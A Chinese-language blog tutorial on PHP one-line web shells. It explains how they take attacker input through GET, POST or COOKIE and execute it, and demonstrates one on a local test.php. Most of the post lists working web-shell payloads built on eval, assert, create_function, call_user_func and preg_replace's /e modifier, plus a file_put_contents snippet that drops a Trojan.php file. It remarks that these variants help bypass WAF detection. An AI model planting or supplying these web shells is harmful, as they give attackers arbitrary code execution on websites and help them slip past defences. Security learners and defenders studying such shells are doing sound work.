• 什么是一句话木马?

一句话木马就是只需要一行代码的木马,短短一行代码,就能做到和大马相当的功能。为了绕过waf的检测,一句话木马出现了无数中变形,但本质是不变的:木马的函数执行了我们发送的命令。

我们可以通过GET 、POST 、COOKIE这三种方式向一个网站提交数据,一句话木马用$_GET[' ']、$_POST[' ']、$_COOKIE[' '] 接收我们传递的数据,并把接收的数据传递给一句话木马中执行命令的函数,进而执行命令。
所以看到的经典一句话木马大多都是只有两个部分,一个是可以执行代码的函数部分,一个是接收数据的部分。

例如:<?php eval(@$_POST['a']); ?>

其中eval就是执行命令的函数,$_POST['a']就是接收的数据。eval函数把接收的数据当作PHP代码来执行。这样我们就能够让插入了一句话木马的网站执行我们传递过去的任意PHP语句。这便是一句话木马的强大之处。

  • 演示:

在网站根目录下新建一个名为test.php的文件,里面写入<?php eval(@$_POST["a"]);?>

PHP一句话木马-D-R0s1博客
PHP一句话木马-D-R0s1博客

因为木马是接收post请求中 “a” 的数据( $_POST[‘a’]),所以我们必须以post方法发送数据并且将我们要执行的代码赋值给“a”。如果把木马中的post替换成get,那么我么就需要以GET方法发送“a”,( 就像这样: http://127.0.0.1/test.php?a=phpinfo(); )我就不再另行演示了。

  • 稍微汇总一下可以用来制作一句话木马的函数,不足之处还会通过后面的学习进行补充

assert函数

<?php assert(@$_POST['a']); ?>

create_function函数

<?php 
$fun = create_function('',$_POST['a']);
$fun();
?>

把用户传递的数据生成一个函数fun(),然后再执行fun()

call_user_func回调函数

<?php
@call_user_func(assert,$_POST['a']);
?>

call_user_func这个函数可以调用其它函数,被调用的函数是call_user_func的第一个函数,被调用的函数的参数是call_user_func的第二个参数。这样的一个语句也可以完成一句话木马。一些被waf拦截的木马可以配合这个函数绕过waf。

preg_replace函数

<?php 
@preg_replace("/abcde/e", $_POST['a'], "abcdefg");
?>

这个函数原本是利用正则表达式替换符合条件的字符串,但是这个函数有一个功能—可执行命令。这个函数的第一个参数是正则表达式,按照PHP的格式,表达式在两个“/”之间。如果我们在这个表达式的末尾加上“e”,那么这个函数的第二个参数就会被当作代码执行。

file_put_contents函数

利用函数生成木马

<?php
$test='<?php $a=$_POST["cmd"];assert($a); ?>';
file_put_contents("Trojan.php", $test);
?>

函数功能:生成一个文件,第一个参数是文件名,第二个参数是文件的内容。